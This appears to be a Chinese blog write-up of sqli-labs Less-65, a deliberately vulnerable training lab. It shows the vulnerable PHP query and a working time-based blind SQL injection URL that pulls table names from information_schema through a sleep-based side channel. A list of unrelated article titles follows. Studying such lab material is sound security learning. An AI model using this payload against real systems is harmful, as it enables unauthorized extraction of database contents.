Less-65

$id = '"'.$id.'"';

// Querry DB to get the correct output

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

此处对id进行了  “” ()  的处理,构造payload时应该注意。这里给出示例payload:

http://127.0.0.1/sqli-labs/Less-65/?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

最新文章

  1. Jenkins + svn + maven 构建持续集成环境搭建
  2. 假如 UNION ALL 里面的子句 有 JOIN ,那个执行更快呢
  3. jvm中的年轻代 老年代 持久代 gc
  4. Python语言十分钟快速入门
  5. 在SQL Server 2012中实现CDC for Oracle
  6. 利用gitHub搭建博客
  7. iOS---cell-自适应高度
  8. XMPP Server
  9. ViewPage显示Fragment集合实现左右滑动并且出现tab栏--第三方开源--SlidingTabLayout和SlidingTabStrip实现
  10. Basic Vlan Configure
  11. window系统上用PHP获取本地物理IP代码
  12. HDU2059(龟兔赛跑)
  13. MySql俩种分页区别(注意)
  14. 爬虫利器BeautifulSoup模块使用
  15. redis安装异常的解决的办法
  16. 懵逼的this指向
  17. ASP.NET Web API 2 之文件下载
  18. Modbus库开发笔记之八:CRC循环冗余校验的研究与实现
  19. Java核心技术-映射
  20. java泛型-自定义泛型方法与类型推断总结

热门文章

  1. java基础笔记
  2. 关于fseek和文件"ab+"打开方式的问题
  3. iphone/ipad关于size, frame and bounds总结和UIScroll view学习笔记
  4. 利用JQ实现的,高仿 彩虹岛官网导航栏(学习HTML过程中的小记录)
  5. 6.24AppCan移动开发者大会价值30万的展示机会归了谁?
  6. String.split()方法你可能不知道的一面
  7. git的初步使用
  8. ios9网络请求https适配
  9. [转]Cygwin的包管理器:apt-cyg
  10. java7新特新(一) Try-with-resources (TWR)